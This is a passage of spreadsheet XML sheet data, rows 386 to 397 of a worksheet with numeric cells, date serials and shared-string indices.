      <c r="T386">
        <v>1</v>
      </c>
      <c r="U386">
        <v>670</v>
      </c>
      <c r="V386">
        <v>0</v>
      </c>
      <c r="W386">
        <v>0</v>
      </c>
      <c r="X386">
        <v>1296</v>
      </c>
      <c r="Y386">
        <v>0</v>
      </c>
      <c r="Z386">
        <v>0</v>
      </c>
      <c r="AA386">
        <v>0</v>
      </c>
      <c r="AB386">
        <v>640</v>
      </c>
      <c r="AC386">
        <v>58000</v>
      </c>
      <c r="AD386">
        <v>0</v>
      </c>
      <c r="AE386">
        <v>53000</v>
      </c>
      <c r="AF386" t="s">
        <v>3174</v>
      </c>
      <c r="AG386">
        <v>35122</v>
      </c>
      <c r="AH386">
        <v>10</v>
      </c>
      <c r="AJ386">
        <v>128</v>
      </c>
      <c r="AK386" t="s">
        <v>65</v>
      </c>
      <c r="AL386" t="s">
        <v>3175</v>
      </c>
      <c r="AM386" t="s">
        <v>3198</v>
      </c>
      <c r="AN386" t="s">
        <v>55</v>
      </c>
      <c r="AO386">
        <v>2006</v>
      </c>
      <c r="AP386" t="s">
        <v>3199</v>
      </c>
      <c r="AQ386" t="s">
        <v>3200</v>
      </c>
      <c r="AR386" t="s">
        <v>3201</v>
      </c>
      <c r="AU386">
        <v>25</v>
      </c>
      <c r="AV386">
        <v>2</v>
      </c>
      <c r="AW386">
        <v>18</v>
      </c>
      <c r="AX386">
        <v>519</v>
      </c>
      <c r="AY386">
        <v>59</v>
      </c>
      <c r="AZ386">
        <v>57</v>
      </c>
      <c r="BA386" t="s">
        <v>17403</v>
      </c>
      <c r="BB386" t="s">
        <v>15088</v>
      </c>
      <c r="BC386" t="s">
        <v>11236</v>
      </c>
      <c r="BD386" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="387" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A387">
        <v>879</v>
      </c>
      <c r="B387" t="s">
        <v>3202</v>
      </c>
      <c r="C387" t="s">
        <v>157</v>
      </c>
      <c r="D387" t="s">
        <v>3203</v>
      </c>
      <c r="E387" t="s">
        <v>363</v>
      </c>
      <c r="F387" t="s">
        <v>3204</v>
      </c>
      <c r="G387" s="1">
        <v>44116</v>
      </c>
      <c r="H387">
        <v>4495</v>
      </c>
      <c r="I387">
        <v>4495</v>
      </c>
      <c r="J387">
        <v>0</v>
      </c>
      <c r="K387">
        <v>0</v>
      </c>
      <c r="L387">
        <v>0</v>
      </c>
      <c r="M387">
        <v>0</v>
      </c>
      <c r="N387">
        <v>0</v>
      </c>
      <c r="O387">
        <v>0</v>
      </c>
      <c r="P387">
        <v>0</v>
      </c>
      <c r="Q387">
        <v>0</v>
      </c>
      <c r="R387">
        <v>0</v>
      </c>
      <c r="S387">
        <v>0</v>
      </c>
      <c r="T387">
        <v>2</v>
      </c>
      <c r="U387">
        <v>0</v>
      </c>
      <c r="V387">
        <v>0</v>
      </c>
      <c r="W387">
        <v>0</v>
      </c>
      <c r="X387">
        <v>0</v>
      </c>
      <c r="Y387">
        <v>0</v>
      </c>
      <c r="Z387">
        <v>0</v>
      </c>
      <c r="AA387">
        <v>0</v>
      </c>
      <c r="AB387">
        <v>0</v>
      </c>
      <c r="AC387">
        <v>0</v>
      </c>
      <c r="AD387">
        <v>0</v>
      </c>
      <c r="AE387">
        <v>4000</v>
      </c>
      <c r="AF387" t="s">
        <v>3205</v>
      </c>
      <c r="AG387">
        <v>60293</v>
      </c>
      <c r="AH387">
        <v>16</v>
      </c>
      <c r="AJ387">
        <v>264</v>
      </c>
      <c r="AK387" t="s">
        <v>3206</v>
      </c>
      <c r="AL387" t="s">
        <v>3207</v>
      </c>
      <c r="AM387" t="s">
        <v>3208</v>
      </c>
      <c r="AN387" t="s">
        <v>68</v>
      </c>
      <c r="AO387">
        <v>2016</v>
      </c>
      <c r="AP387">
        <v>81234528998</v>
      </c>
      <c r="AQ387" t="s">
        <v>3209</v>
      </c>
      <c r="AR387" t="s">
        <v>3205</v>
      </c>
      <c r="AS387" t="s">
        <v>71</v>
      </c>
      <c r="AT387" t="s">
        <v>72</v>
      </c>
      <c r="AU387">
        <v>25</v>
      </c>
      <c r="AV387">
        <v>1</v>
      </c>
      <c r="AW387">
        <v>4</v>
      </c>
      <c r="AX387">
        <v>2</v>
      </c>
      <c r="AY387">
        <v>2</v>
      </c>
      <c r="AZ387">
        <v>2</v>
      </c>
      <c r="BA387" t="s">
        <v>17420</v>
      </c>
      <c r="BB387" t="s">
        <v>14911</v>
      </c>
      <c r="BC387">
        <v>0</v>
      </c>
      <c r="BD387" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="388" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A388">
        <v>1638</v>
      </c>
      <c r="B388" t="s">
        <v>3210</v>
      </c>
      <c r="C388" t="s">
        <v>88</v>
      </c>
      <c r="D388" t="s">
        <v>3211</v>
      </c>
      <c r="E388" t="s">
        <v>111</v>
      </c>
      <c r="F388" t="s">
        <v>3212</v>
      </c>
      <c r="G388" s="1">
        <v>44293</v>
      </c>
      <c r="H388">
        <v>4550</v>
      </c>
      <c r="I388">
        <v>4550</v>
      </c>
      <c r="J388">
        <v>6</v>
      </c>
      <c r="K388">
        <v>4</v>
      </c>
      <c r="L388">
        <v>5</v>
      </c>
      <c r="M388">
        <v>0</v>
      </c>
      <c r="N388">
        <v>0</v>
      </c>
      <c r="O388">
        <v>0</v>
      </c>
      <c r="P388">
        <v>0</v>
      </c>
      <c r="Q388">
        <v>0</v>
      </c>
      <c r="R388">
        <v>6</v>
      </c>
      <c r="S388">
        <v>1</v>
      </c>
      <c r="T388">
        <v>1</v>
      </c>
      <c r="U388">
        <v>6000000</v>
      </c>
      <c r="V388">
        <v>24000</v>
      </c>
      <c r="W388">
        <v>25000</v>
      </c>
      <c r="X388">
        <v>0</v>
      </c>
      <c r="Y388">
        <v>0</v>
      </c>
      <c r="Z388">
        <v>0</v>
      </c>
      <c r="AA388">
        <v>0</v>
      </c>
      <c r="AB388">
        <v>0</v>
      </c>
      <c r="AC388">
        <v>25000</v>
      </c>
      <c r="AD388">
        <v>5000</v>
      </c>
      <c r="AE388">
        <v>100000</v>
      </c>
      <c r="AF388" t="s">
        <v>3213</v>
      </c>
      <c r="AG388">
        <v>80222</v>
      </c>
      <c r="AH388">
        <v>17</v>
      </c>
      <c r="AJ388">
        <v>282</v>
      </c>
      <c r="AK388" t="s">
        <v>592</v>
      </c>
      <c r="AL388" t="s">
        <v>593</v>
      </c>
      <c r="AM388" t="s">
        <v>3214</v>
      </c>
      <c r="AN388" t="s">
        <v>55</v>
      </c>
      <c r="AO388">
        <v>2011</v>
      </c>
      <c r="AP388" t="s">
        <v>3215</v>
      </c>
      <c r="AQ388" t="s">
        <v>3216</v>
      </c>
      <c r="AR388" t="s">
        <v>3217</v>
      </c>
      <c r="AS388" t="s">
        <v>71</v>
      </c>
      <c r="AT388" t="s">
        <v>58</v>
      </c>
      <c r="AU388">
        <v>50</v>
      </c>
      <c r="AV388">
        <v>1</v>
      </c>
      <c r="AW388">
        <v>373</v>
      </c>
      <c r="AX388">
        <v>137</v>
      </c>
      <c r="AY388">
        <v>11</v>
      </c>
      <c r="AZ388">
        <v>17</v>
      </c>
      <c r="BA388" t="s">
        <v>16958</v>
      </c>
      <c r="BB388" t="s">
        <v>15418</v>
      </c>
      <c r="BC388">
        <v>0</v>
      </c>
      <c r="BD388" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="389" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A389">
        <v>1125</v>
      </c>
      <c r="B389" t="s">
        <v>3218</v>
      </c>
      <c r="C389" t="s">
        <v>74</v>
      </c>
      <c r="D389" t="s">
        <v>3219</v>
      </c>
      <c r="E389" t="s">
        <v>142</v>
      </c>
      <c r="F389" t="s">
        <v>666</v>
      </c>
      <c r="G389" s="1">
        <v>44200</v>
      </c>
      <c r="H389">
        <v>4605</v>
      </c>
      <c r="AF389" t="s">
        <v>3220</v>
      </c>
      <c r="AG389">
        <v>59185</v>
      </c>
      <c r="AH389">
        <v>14</v>
      </c>
      <c r="AJ389">
        <v>205</v>
      </c>
      <c r="AK389" t="s">
        <v>3221</v>
      </c>
      <c r="AL389" t="s">
        <v>3222</v>
      </c>
      <c r="AM389" t="s">
        <v>3223</v>
      </c>
      <c r="AN389" t="s">
        <v>55</v>
      </c>
      <c r="AO389">
        <v>2017</v>
      </c>
      <c r="AP389">
        <v>81225454999</v>
      </c>
      <c r="AQ389" t="s">
        <v>3224</v>
      </c>
      <c r="AR389" t="s">
        <v>3220</v>
      </c>
      <c r="AS389" t="s">
        <v>179</v>
      </c>
      <c r="AT389" t="s">
        <v>58</v>
      </c>
      <c r="AU389">
        <v>0</v>
      </c>
      <c r="AV389">
        <v>0</v>
      </c>
      <c r="AW389">
        <v>5</v>
      </c>
      <c r="AX389">
        <v>0</v>
      </c>
      <c r="AY389">
        <v>19</v>
      </c>
      <c r="AZ389">
        <v>4</v>
      </c>
      <c r="BA389">
        <v>0</v>
      </c>
      <c r="BB389">
        <v>0</v>
      </c>
      <c r="BC389" t="s">
        <v>11364</v>
      </c>
      <c r="BD389">
        <v>0</v>
      </c>
    </row>
    <row r="390" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A390">
        <v>1222</v>
      </c>
      <c r="B390" t="s">
        <v>3225</v>
      </c>
      <c r="C390" t="s">
        <v>129</v>
      </c>
      <c r="D390" t="s">
        <v>3226</v>
      </c>
      <c r="E390" t="s">
        <v>3227</v>
      </c>
      <c r="F390" t="s">
        <v>3228</v>
      </c>
      <c r="G390" s="1">
        <v>44022</v>
      </c>
      <c r="H390">
        <v>4679</v>
      </c>
      <c r="I390">
        <v>4679</v>
      </c>
      <c r="J390">
        <v>1</v>
      </c>
      <c r="K390">
        <v>2</v>
      </c>
      <c r="L390">
        <v>0</v>
      </c>
      <c r="M390">
        <v>0</v>
      </c>
      <c r="N390">
        <v>0</v>
      </c>
      <c r="O390">
        <v>0</v>
      </c>
      <c r="P390">
        <v>0</v>
      </c>
      <c r="Q390">
        <v>2</v>
      </c>
      <c r="R390">
        <v>39</v>
      </c>
      <c r="S390">
        <v>0</v>
      </c>
      <c r="T390">
        <v>1</v>
      </c>
      <c r="U390">
        <v>20000</v>
      </c>
      <c r="V390">
        <v>200</v>
      </c>
      <c r="W390">
        <v>0</v>
      </c>
      <c r="X390">
        <v>0</v>
      </c>
      <c r="Y390">
        <v>0</v>
      </c>
      <c r="Z390">
        <v>0</v>
      </c>
      <c r="AA390">
        <v>0</v>
      </c>
      <c r="AB390">
        <v>50</v>
      </c>
      <c r="AC390">
        <v>2000</v>
      </c>
      <c r="AD390">
        <v>0</v>
      </c>
      <c r="AE390">
        <v>2000</v>
      </c>
      <c r="AF390" t="s">
        <v>3229</v>
      </c>
      <c r="AG390">
        <v>15125</v>
      </c>
      <c r="AH390">
        <v>11</v>
      </c>
      <c r="AJ390">
        <v>270</v>
      </c>
      <c r="AK390" t="s">
        <v>1048</v>
      </c>
      <c r="AL390" t="s">
        <v>1048</v>
      </c>
      <c r="AM390" t="s">
        <v>3230</v>
      </c>
      <c r="AN390" t="s">
        <v>55</v>
      </c>
      <c r="AO390">
        <v>2016</v>
      </c>
      <c r="AP390">
        <v>82213592753</v>
      </c>
      <c r="AQ390" t="s">
        <v>3231</v>
      </c>
      <c r="AR390" t="s">
        <v>3232</v>
      </c>
      <c r="AS390" t="s">
        <v>57</v>
      </c>
      <c r="AT390" t="s">
        <v>58</v>
      </c>
      <c r="AU390">
        <v>24</v>
      </c>
      <c r="AV390">
        <v>0</v>
      </c>
      <c r="AW390">
        <v>0</v>
      </c>
      <c r="AX390">
        <v>0</v>
      </c>
      <c r="AY390">
        <v>11</v>
      </c>
      <c r="AZ390">
        <v>3</v>
      </c>
      <c r="BA390" t="s">
        <v>16822</v>
      </c>
      <c r="BB390" t="s">
        <v>15136</v>
      </c>
      <c r="BC390">
        <v>0</v>
      </c>
      <c r="BD390" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="391" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A391">
        <v>993</v>
      </c>
      <c r="B391" t="s">
        <v>3233</v>
      </c>
      <c r="C391" t="s">
        <v>318</v>
      </c>
      <c r="D391" t="s">
        <v>3234</v>
      </c>
      <c r="E391" t="s">
        <v>111</v>
      </c>
      <c r="F391" t="s">
        <v>3235</v>
      </c>
      <c r="G391" s="1">
        <v>44235</v>
      </c>
      <c r="H391">
        <v>4690</v>
      </c>
      <c r="I391">
        <v>4690</v>
      </c>
      <c r="J391">
        <v>2</v>
      </c>
      <c r="K391">
        <v>2</v>
      </c>
      <c r="L391">
        <v>2</v>
      </c>
      <c r="M391">
        <v>0</v>
      </c>
      <c r="N391">
        <v>0</v>
      </c>
      <c r="O391">
        <v>1</v>
      </c>
      <c r="P391">
        <v>0</v>
      </c>
      <c r="Q391">
        <v>20</v>
      </c>
      <c r="R391">
        <v>1</v>
      </c>
      <c r="S391">
        <v>0</v>
      </c>
      <c r="T391">
        <v>0</v>
      </c>
      <c r="U391">
        <v>25000</v>
      </c>
      <c r="V391">
        <v>10000</v>
      </c>
      <c r="W391">
        <v>10000</v>
      </c>
      <c r="X391">
        <v>0</v>
      </c>
      <c r="Y391">
        <v>0</v>
      </c>
      <c r="Z391">
        <v>5000</v>
      </c>
      <c r="AA391">
        <v>0</v>
      </c>
      <c r="AB391">
        <v>50</v>
      </c>
      <c r="AC391">
        <v>1000</v>
      </c>
      <c r="AD391">
        <v>0</v>
      </c>
      <c r="AE391">
        <v>0</v>
      </c>
      <c r="AF391" t="s">
        <v>3236</v>
      </c>
      <c r="AG391">
        <v>90240</v>
      </c>
      <c r="AH391">
        <v>26</v>
      </c>
      <c r="AJ391">
        <v>420</v>
      </c>
      <c r="AK391" t="s">
        <v>331</v>
      </c>
      <c r="AL391" t="s">
        <v>332</v>
      </c>
      <c r="AM391" t="s">
        <v>3237</v>
      </c>
      <c r="AN391" t="s">
        <v>55</v>
      </c>
      <c r="AO391">
        <v>2012</v>
      </c>
      <c r="AP391">
        <v>82112761786</v>
      </c>
      <c r="AQ391" t="s">
        <v>3238</v>
      </c>
      <c r="AR391" t="s">
        <v>3239</v>
      </c>
      <c r="AS391" t="s">
        <v>71</v>
      </c>
      <c r="AT391" t="s">
        <v>58</v>
      </c>
      <c r="AU391">
        <v>24</v>
      </c>
      <c r="AV391">
        <v>1</v>
      </c>
      <c r="AW391">
        <v>19</v>
      </c>
      <c r="AX391">
        <v>35</v>
      </c>
      <c r="AY391">
        <v>15</v>
      </c>
      <c r="AZ391">
        <v>14</v>
      </c>
      <c r="BA391" t="s">
        <v>17435</v>
      </c>
      <c r="BB391" t="s">
        <v>14986</v>
      </c>
      <c r="BC391">
        <v>0</v>
      </c>
      <c r="BD391" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="392" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A392">
        <v>848</v>
      </c>
      <c r="B392" t="s">
        <v>3240</v>
      </c>
      <c r="C392" t="s">
        <v>99</v>
      </c>
      <c r="D392" t="s">
        <v>3241</v>
      </c>
      <c r="E392" t="s">
        <v>131</v>
      </c>
      <c r="F392" t="s">
        <v>3242</v>
      </c>
      <c r="G392" s="1">
        <v>44053</v>
      </c>
      <c r="H392">
        <v>4719</v>
      </c>
      <c r="I392">
        <v>4719</v>
      </c>
      <c r="J392">
        <v>1</v>
      </c>
      <c r="K392">
        <v>1</v>
      </c>
      <c r="L392">
        <v>1</v>
      </c>
      <c r="M392">
        <v>0</v>
      </c>
      <c r="N392">
        <v>0</v>
      </c>
      <c r="O392">
        <v>0</v>
      </c>
      <c r="P392">
        <v>0</v>
      </c>
      <c r="Q392">
        <v>0</v>
      </c>
      <c r="R392">
        <v>0</v>
      </c>
      <c r="S392">
        <v>0</v>
      </c>
      <c r="T392">
        <v>1</v>
      </c>
      <c r="U392">
        <v>1000</v>
      </c>
      <c r="V392">
        <v>1000</v>
      </c>
      <c r="W392">
        <v>1000</v>
      </c>
      <c r="X392">
        <v>0</v>
      </c>
      <c r="Y392">
        <v>0</v>
      </c>
      <c r="Z392">
        <v>0</v>
      </c>
      <c r="AA392">
        <v>0</v>
      </c>
      <c r="AB392">
        <v>0</v>
      </c>
      <c r="AC392">
        <v>0</v>
      </c>
      <c r="AD392">
        <v>0</v>
      </c>
      <c r="AE392">
        <v>14000</v>
      </c>
      <c r="AF392" t="s">
        <v>3243</v>
      </c>
      <c r="AG392">
        <v>13630</v>
      </c>
      <c r="AH392">
        <v>12</v>
      </c>
      <c r="AJ392">
        <v>157</v>
      </c>
      <c r="AK392" t="s">
        <v>3244</v>
      </c>
      <c r="AL392" t="s">
        <v>3245</v>
      </c>
      <c r="AM392" t="s">
        <v>3246</v>
      </c>
      <c r="AN392" t="s">
        <v>55</v>
      </c>
      <c r="AO392">
        <v>2015</v>
      </c>
      <c r="AP392" t="s">
        <v>3247</v>
      </c>
      <c r="AQ392" t="s">
        <v>3248</v>
      </c>
      <c r="AR392" t="s">
        <v>3249</v>
      </c>
      <c r="AS392" t="s">
        <v>71</v>
      </c>
      <c r="AT392" t="s">
        <v>58</v>
      </c>
      <c r="AU392">
        <v>0</v>
      </c>
      <c r="AV392">
        <v>0</v>
      </c>
      <c r="AW392">
        <v>3</v>
      </c>
      <c r="AX392">
        <v>0</v>
      </c>
      <c r="AY392">
        <v>12</v>
      </c>
      <c r="AZ392">
        <v>15</v>
      </c>
      <c r="BA392" t="s">
        <v>17428</v>
      </c>
      <c r="BB392" t="s">
        <v>16032</v>
      </c>
      <c r="BC392" t="s">
        <v>11394</v>
      </c>
      <c r="BD392" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="393" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A393">
        <v>953</v>
      </c>
      <c r="B393" t="s">
        <v>3250</v>
      </c>
      <c r="C393" t="s">
        <v>157</v>
      </c>
      <c r="D393" t="s">
        <v>3251</v>
      </c>
      <c r="E393" t="s">
        <v>944</v>
      </c>
      <c r="F393" t="s">
        <v>2105</v>
      </c>
      <c r="G393" s="1">
        <v>44070</v>
      </c>
      <c r="H393">
        <v>4761</v>
      </c>
      <c r="I393">
        <v>4761</v>
      </c>
      <c r="J393">
        <v>0</v>
      </c>
      <c r="K393">
        <v>0</v>
      </c>
      <c r="L393">
        <v>0</v>
      </c>
      <c r="M393">
        <v>0</v>
      </c>
      <c r="N393">
        <v>0</v>
      </c>
      <c r="O393">
        <v>0</v>
      </c>
      <c r="P393">
        <v>2</v>
      </c>
      <c r="Q393">
        <v>0</v>
      </c>
      <c r="R393">
        <v>12</v>
      </c>
      <c r="S393">
        <v>10</v>
      </c>
      <c r="T393">
        <v>2</v>
      </c>
      <c r="U393">
        <v>0</v>
      </c>
      <c r="V393">
        <v>0</v>
      </c>
      <c r="W393">
        <v>0</v>
      </c>
      <c r="X393">
        <v>0</v>
      </c>
      <c r="Y393">
        <v>0</v>
      </c>
      <c r="Z393">
        <v>0</v>
      </c>
      <c r="AA393">
        <v>4000</v>
      </c>
      <c r="AB393">
        <v>0</v>
      </c>
      <c r="AC393">
        <v>3000</v>
      </c>
      <c r="AD393">
        <v>4000</v>
      </c>
      <c r="AE393">
        <v>2400</v>
      </c>
      <c r="AF393" t="s">
        <v>3252</v>
      </c>
      <c r="AG393">
        <v>68472</v>
      </c>
      <c r="AH393">
        <v>16</v>
      </c>
      <c r="AJ393">
        <v>237</v>
      </c>
      <c r="AK393" t="s">
        <v>377</v>
      </c>
      <c r="AL393" t="s">
        <v>378</v>
      </c>
      <c r="AM393" t="s">
        <v>3253</v>
      </c>
      <c r="AN393" t="s">
        <v>82</v>
      </c>
      <c r="AO393">
        <v>1969</v>
      </c>
      <c r="AP393" t="s">
        <v>3254</v>
      </c>
      <c r="AQ393" t="s">
        <v>3255</v>
      </c>
      <c r="AR393" t="s">
        <v>3256</v>
      </c>
      <c r="AS393" t="s">
        <v>71</v>
      </c>
      <c r="AT393" t="s">
        <v>86</v>
      </c>
      <c r="AU393">
        <v>26</v>
      </c>
      <c r="AV393">
        <v>1</v>
      </c>
      <c r="AW393">
        <v>7</v>
      </c>
      <c r="AX393">
        <v>12</v>
      </c>
      <c r="AY393">
        <v>17</v>
      </c>
      <c r="AZ393">
        <v>11</v>
      </c>
      <c r="BA393" t="s">
        <v>16782</v>
      </c>
      <c r="BB393" t="s">
        <v>14960</v>
      </c>
      <c r="BC393" t="s">
        <v>11407</v>
      </c>
      <c r="BD393">
        <v>0</v>
      </c>
    </row>
    <row r="394" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A394">
        <v>1678</v>
      </c>
      <c r="B394" t="s">
        <v>3257</v>
      </c>
      <c r="C394" t="s">
        <v>157</v>
      </c>
      <c r="D394" t="s">
        <v>3258</v>
      </c>
      <c r="E394" t="s">
        <v>363</v>
      </c>
      <c r="F394" t="s">
        <v>547</v>
      </c>
      <c r="G394" s="1">
        <v>44166</v>
      </c>
      <c r="H394">
        <v>4766</v>
      </c>
      <c r="I394">
        <v>4766</v>
      </c>
      <c r="J394">
        <v>0</v>
      </c>
      <c r="K394">
        <v>0</v>
      </c>
      <c r="L394">
        <v>0</v>
      </c>
      <c r="M394">
        <v>0</v>
      </c>
      <c r="N394">
        <v>0</v>
      </c>
      <c r="O394">
        <v>0</v>
      </c>
      <c r="P394">
        <v>0</v>
      </c>
      <c r="Q394">
        <v>2</v>
      </c>
      <c r="R394">
        <v>2</v>
      </c>
      <c r="S394">
        <v>0</v>
      </c>
      <c r="T394">
        <v>1</v>
      </c>
      <c r="U394">
        <v>0</v>
      </c>
      <c r="V394">
        <v>0</v>
      </c>
      <c r="W394">
        <v>0</v>
      </c>
      <c r="X394">
        <v>0</v>
      </c>
      <c r="Y394">
        <v>0</v>
      </c>
      <c r="Z394">
        <v>0</v>
      </c>
      <c r="AA394">
        <v>0</v>
      </c>
      <c r="AB394">
        <v>2000</v>
      </c>
      <c r="AC394">
        <v>2000</v>
      </c>
      <c r="AD394">
        <v>0</v>
      </c>
      <c r="AE394">
        <v>2000</v>
      </c>
      <c r="AF394" t="s">
        <v>3259</v>
      </c>
      <c r="AG394">
        <v>60192</v>
      </c>
      <c r="AH394">
        <v>16</v>
      </c>
      <c r="AJ394">
        <v>264</v>
      </c>
      <c r="AK394" t="s">
        <v>3260</v>
      </c>
      <c r="AL394" t="s">
        <v>3261</v>
      </c>
      <c r="AM394" t="s">
        <v>3262</v>
      </c>
      <c r="AN394" t="s">
        <v>55</v>
      </c>
      <c r="AO394">
        <v>2019</v>
      </c>
      <c r="AP394">
        <v>8123150009</v>
      </c>
      <c r="AQ394" t="s">
        <v>3263</v>
      </c>
      <c r="AR394" t="s">
        <v>3259</v>
      </c>
      <c r="AS394" t="s">
        <v>71</v>
      </c>
      <c r="AT394" t="s">
        <v>58</v>
      </c>
      <c r="AU394">
        <v>25</v>
      </c>
      <c r="AV394">
        <v>1</v>
      </c>
      <c r="AW394">
        <v>5</v>
      </c>
      <c r="AX394">
        <v>5</v>
      </c>
      <c r="AY394">
        <v>8</v>
      </c>
      <c r="AZ394">
        <v>3</v>
      </c>
      <c r="BA394" t="s">
        <v>16969</v>
      </c>
      <c r="BB394" t="s">
        <v>15443</v>
      </c>
      <c r="BC394" t="s">
        <v>9522</v>
      </c>
      <c r="BD394" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="395" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A395">
        <v>1144</v>
      </c>
      <c r="B395" t="s">
        <v>3264</v>
      </c>
      <c r="C395" t="s">
        <v>157</v>
      </c>
      <c r="D395" t="s">
        <v>3265</v>
      </c>
      <c r="E395" t="s">
        <v>3266</v>
      </c>
      <c r="F395" t="s">
        <v>3267</v>
      </c>
      <c r="G395" s="1">
        <v>44125</v>
      </c>
      <c r="H395">
        <v>4795</v>
      </c>
      <c r="I395">
        <v>4795</v>
      </c>
      <c r="J395">
        <v>0</v>
      </c>
      <c r="K395">
        <v>0</v>
      </c>
      <c r="L395">
        <v>0</v>
      </c>
      <c r="M395">
        <v>0</v>
      </c>
      <c r="N395">
        <v>0</v>
      </c>
      <c r="O395">
        <v>0</v>
      </c>
      <c r="P395">
        <v>0</v>
      </c>
      <c r="Q395">
        <v>10</v>
      </c>
      <c r="R395">
        <v>10</v>
      </c>
      <c r="S395">
        <v>1</v>
      </c>
      <c r="T395">
        <v>1</v>
      </c>
      <c r="U395">
        <v>0</v>
      </c>
      <c r="V395">
        <v>0</v>
      </c>
      <c r="W395">
        <v>0</v>
      </c>
      <c r="X395">
        <v>0</v>
      </c>
      <c r="Y395">
        <v>0</v>
      </c>
      <c r="Z395">
        <v>0</v>
      </c>
      <c r="AA395">
        <v>0</v>
      </c>
      <c r="AB395">
        <v>1000</v>
      </c>
      <c r="AC395">
        <v>1000</v>
      </c>
      <c r="AD395">
        <v>1</v>
      </c>
      <c r="AE395">
        <v>100000</v>
      </c>
      <c r="AF395" t="s">
        <v>3268</v>
      </c>
      <c r="AG395">
        <v>68453</v>
      </c>
      <c r="AH395">
        <v>16</v>
      </c>
      <c r="AJ395">
        <v>237</v>
      </c>
      <c r="AK395" t="s">
        <v>1412</v>
      </c>
      <c r="AL395" t="s">
        <v>1413</v>
      </c>
      <c r="AM395" t="s">
        <v>3269</v>
      </c>
      <c r="AN395" t="s">
        <v>55</v>
      </c>
      <c r="AO395">
        <v>2010</v>
      </c>
      <c r="AP395">
        <v>82139639972</v>
      </c>
      <c r="AQ395" t="s">
        <v>3270</v>
      </c>
      <c r="AR395" t="s">
        <v>3271</v>
      </c>
      <c r="AS395" t="s">
        <v>71</v>
      </c>
      <c r="AT395" t="s">
        <v>58</v>
      </c>
      <c r="AU395">
        <v>57</v>
      </c>
      <c r="AV395">
        <v>1</v>
      </c>
      <c r="AW395">
        <v>19</v>
      </c>
      <c r="AX395">
        <v>30</v>
      </c>
      <c r="AY395">
        <v>4</v>
      </c>
      <c r="AZ395">
        <v>4</v>
      </c>
      <c r="BA395" t="s">
        <v>16809</v>
      </c>
      <c r="BB395" t="s">
        <v>15082</v>
      </c>
      <c r="BC395" t="s">
        <v>9536</v>
      </c>
      <c r="BD395" t="s">
        <v>10936</v>
      </c>
    </row>
    <row r="396" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A396">
        <v>932</v>
      </c>
      <c r="B396" t="s">
        <v>3272</v>
      </c>
      <c r="C396" t="s">
        <v>47</v>
      </c>
      <c r="D396" t="s">
        <v>3273</v>
      </c>
      <c r="E396" t="s">
        <v>142</v>
      </c>
      <c r="F396" t="s">
        <v>1564</v>
      </c>
      <c r="G396" s="1">
        <v>44340</v>
      </c>
      <c r="H396">
        <v>4807</v>
      </c>
      <c r="I396">
        <v>4807</v>
      </c>
      <c r="J396">
        <v>1</v>
      </c>
      <c r="K396">
        <v>0</v>
      </c>
      <c r="L396">
        <v>0</v>
      </c>
      <c r="M396">
        <v>0</v>
      </c>
      <c r="N396">
        <v>0</v>
      </c>
      <c r="O396">
        <v>0</v>
      </c>
      <c r="P396">
        <v>0</v>
      </c>
      <c r="Q396">
        <v>0</v>
      </c>
      <c r="R396">
        <v>0</v>
      </c>
      <c r="S396">
        <v>0</v>
      </c>
      <c r="T396">
        <v>0</v>
      </c>
      <c r="U396">
        <v>300000</v>
      </c>
      <c r="V396">
        <v>0</v>
      </c>
      <c r="W396">
        <v>0</v>
      </c>
      <c r="X396">
        <v>0</v>
      </c>
      <c r="Y396">
        <v>0</v>
      </c>
      <c r="Z396">
        <v>0</v>
      </c>
      <c r="AA396">
        <v>0</v>
      </c>
      <c r="AB396">
        <v>0</v>
      </c>
      <c r="AC396">
        <v>0</v>
      </c>
      <c r="AD396">
        <v>0</v>
      </c>
      <c r="AE396">
        <v>0</v>
      </c>
      <c r="AF396" t="s">
        <v>3274</v>
      </c>
      <c r="AG396">
        <v>20239</v>
      </c>
      <c r="AH396">
        <v>2</v>
      </c>
      <c r="AJ396">
        <v>53</v>
      </c>
      <c r="AK396" t="s">
        <v>3275</v>
      </c>
      <c r="AL396" t="s">
        <v>3276</v>
      </c>
      <c r="AM396" t="s">
        <v>3277</v>
      </c>
      <c r="AN396" t="s">
        <v>55</v>
      </c>
      <c r="AO396">
        <v>2017</v>
      </c>
      <c r="AP396">
        <v>616637002</v>
      </c>
      <c r="AQ396" t="s">
        <v>3278</v>
      </c>
      <c r="AR396" t="s">
        <v>3279</v>
      </c>
      <c r="AS396" t="s">
        <v>71</v>
      </c>
      <c r="AT396" t="s">
        <v>58</v>
      </c>
      <c r="AU396">
        <v>24</v>
      </c>
      <c r="AV396">
        <v>1</v>
      </c>
      <c r="AW396">
        <v>6</v>
      </c>
      <c r="AX396">
        <v>0</v>
      </c>
      <c r="AY396">
        <v>2</v>
      </c>
      <c r="AZ396">
        <v>1</v>
      </c>
      <c r="BA396" t="s">
        <v>17439</v>
      </c>
      <c r="BB396" t="s">
        <v>16034</v>
      </c>
      <c r="BC396" t="s">
        <v>13816</v>
      </c>
      <c r="BD396">
        <v>0</v>
      </c>
    </row>
    <row r="397" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A397">
        <v>1052</v>
      </c>
      <c r="B397" t="s">
        <v>3280</v>
      </c>
      <c r="C397" t="s">
        <v>477</v>
      </c>
      <c r="D397" t="s">
        <v>3281</v>
      </c>
      <c r="E397" t="s">
        <v>111</v>
      </c>
      <c r="F397" t="s">
        <v>1223</v>
      </c>
      <c r="G397" s="1">
        <v>44139</v>
      </c>
      <c r="H397">
        <v>4809</v>
      </c>
      <c r="I397">
        <v>4809</v>
      </c>
      <c r="J397">
        <v>1</v>
      </c>
      <c r="K397">
        <v>1</v>
      </c>
      <c r="L397">
        <v>1</v>
      </c>
      <c r="M397">
